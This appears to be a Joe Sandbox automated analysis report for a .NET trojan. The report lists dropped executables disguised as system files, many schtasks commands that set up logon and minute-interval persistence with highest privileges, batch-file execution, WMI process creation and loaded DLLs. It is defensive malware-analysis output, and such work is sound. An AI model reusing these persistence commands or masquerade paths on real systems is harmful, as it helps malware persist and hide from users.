Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Code function: 31_2_00007FF848F10E43	31_2_00007FF848F10E43
Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Code function: 31_2_00007FF848F16119	31_2_00007FF848F16119
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Code function: 33_2_00007FF848F20D48	33_2_00007FF848F20D48
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Code function: 33_2_00007FF848F20E43	33_2_00007FF848F20E43
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Code function: 38_2_00007FF848F30D48	38_2_00007FF848F30D48
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Code function: 38_2_00007FF848F30E43	38_2_00007FF848F30E43

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\AxEwwgFd.log DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254

Source: F3ePjP272h.exe, 00000000.00000000.2004955727.0000000000702000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs F3ePjP272h.exe
Source: F3ePjP272h.exe, 00000000.00000002.2052992245.000000001B67C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs F3ePjP272h.exe
Source: F3ePjP272h.exe, 00000018.00000002.2180108017.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs F3ePjP272h.exe
Source: F3ePjP272h.exe, 00000018.00000002.2180108017.0000000002FF3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs F3ePjP272h.exe
Source: F3ePjP272h.exe, 00000019.00000002.2198814647.00000000027A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs F3ePjP272h.exe
Source: F3ePjP272h.exe, 00000019.00000002.2198814647.00000000026E2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs F3ePjP272h.exe
Source: F3ePjP272h.exe, 00000019.00000002.2198814647.0000000002787000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs F3ePjP272h.exe
Source: F3ePjP272h.exe, 00000019.00000002.2198814647.00000000026D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs F3ePjP272h.exe
Source: F3ePjP272h.exe	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs F3ePjP272h.exe

Source: F3ePjP272h.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: F3ePjP272h.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: sihost.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: jmfWpjtPWHWFodUifDHiQtgxi.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: jmfWpjtPWHWFodUifDHiQtgxi.exe0.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Idle.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: F3ePjP272h.exe, KVnWYPJNu8w0oyv3iR1.cs	Cryptographic APIs: 'CreateDecryptor'
Source: F3ePjP272h.exe, KVnWYPJNu8w0oyv3iR1.cs	Cryptographic APIs: 'CreateDecryptor'
Source: F3ePjP272h.exe, KVnWYPJNu8w0oyv3iR1.cs	Cryptographic APIs: 'CreateDecryptor'
Source: F3ePjP272h.exe, KVnWYPJNu8w0oyv3iR1.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.evad.winEXE@45/34@1/1

Source: C:\Users\user\Desktop\F3ePjP272h.exe

File created: C:\Program Files (x86)\reference assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe

Jump to behavior

Source: C:\Users\user\Desktop\F3ePjP272h.exe

File created: C:\Users\user\Desktop\zjWVMLxf.log

Jump to behavior

Source: C:\Windows\Speech\Engines\SR\Idle.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6512:120:WilError_03
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-ECwREtx4Ah9meGkc6cqJ
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_03

Source: C:\Users\user\Desktop\F3ePjP272h.exe

File created: C:\Users\user\AppData\Local\Temp\pYpeGKxyTa

Jump to behavior

Source: C:\Users\user\Desktop\F3ePjP272h.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\diPKyqwECs.bat"

Source: F3ePjP272h.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: F3ePjP272h.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\F3ePjP272h.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\F3ePjP272h.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: F3ePjP272h.exe	ReversingLabs: Detection: 73%
Source: F3ePjP272h.exe	Virustotal: Detection: 54%

Source: C:\Users\user\Desktop\F3ePjP272h.exe

File read: C:\Users\user\Desktop\F3ePjP272h.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\F3ePjP272h.exe "C:\Users\user\Desktop\F3ePjP272h.exe"
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxij" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows mail\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /f
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxi" /sc ONLOGON /tr "'C:\Program Files (x86)\windows mail\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxij" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows mail\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxij" /sc MINUTE /mo 11 /tr "'C:\Program Files\MSBuild\Microsoft\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /f
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxi" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxij" /sc MINUTE /mo 6 /tr "'C:\Program Files\MSBuild\Microsoft\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 9 /tr "'C:\Users\Default\Cookies\sihost.exe'" /f
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Default\Cookies\sihost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Cookies\sihost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxij" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\reference assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /f
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxi" /sc ONLOGON /tr "'C:\Program Files (x86)\reference assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxij" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\reference assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\Windows\Speech\Engines\SR\Idle.exe'" /f
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Windows\Speech\Engines\SR\Idle.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Windows\Speech\Engines\SR\Idle.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "F3ePjP272hF" /sc MINUTE /mo 11 /tr "'C:\Users\user\Desktop\F3ePjP272h.exe'" /f
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "F3ePjP272h" /sc ONLOGON /tr "'C:\Users\user\Desktop\F3ePjP272h.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "F3ePjP272hF" /sc MINUTE /mo 12 /tr "'C:\Users\user\Desktop\F3ePjP272h.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\diPKyqwECs.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown	Process created: C:\Users\user\Desktop\F3ePjP272h.exe C:\Users\user\Desktop\F3ePjP272h.exe
Source: unknown	Process created: C:\Users\user\Desktop\F3ePjP272h.exe C:\Users\user\Desktop\F3ePjP272h.exe
Source: unknown	Process created: C:\Windows\Speech\Engines\SR\Idle.exe C:\Windows\Speech\Engines\SR\Idle.exe
Source: unknown	Process created: C:\Windows\Speech\Engines\SR\Idle.exe C:\Windows\Speech\Engines\SR\Idle.exe
Source: unknown	Process created: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe "C:\Program Files (x86)\reference assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe"
Source: unknown	Process created: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe "C:\Program Files (x86)\reference assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe"
Source: unknown	Process created: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe C:\Users\Default\Cookies\sihost.exe
Source: unknown	Process created: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe C:\Users\Default\Cookies\sihost.exe
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\euqVpFfbpH.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Speech\Engines\SR\Idle.exe "C:\Windows\Speech\Engines\SR\Idle.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Speech\Engines\SR\Idle.exe "C:\Windows\Speech\Engines\SR\Idle.exe"
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\diPKyqwECs.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Speech\Engines\SR\Idle.exe "C:\Windows\Speech\Engines\SR\Idle.exe"	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\euqVpFfbpH.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Speech\Engines\SR\Idle.exe "C:\Windows\Speech\Engines\SR\Idle.exe"

Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Section loaded: mscoree.dll	Jump to behavior
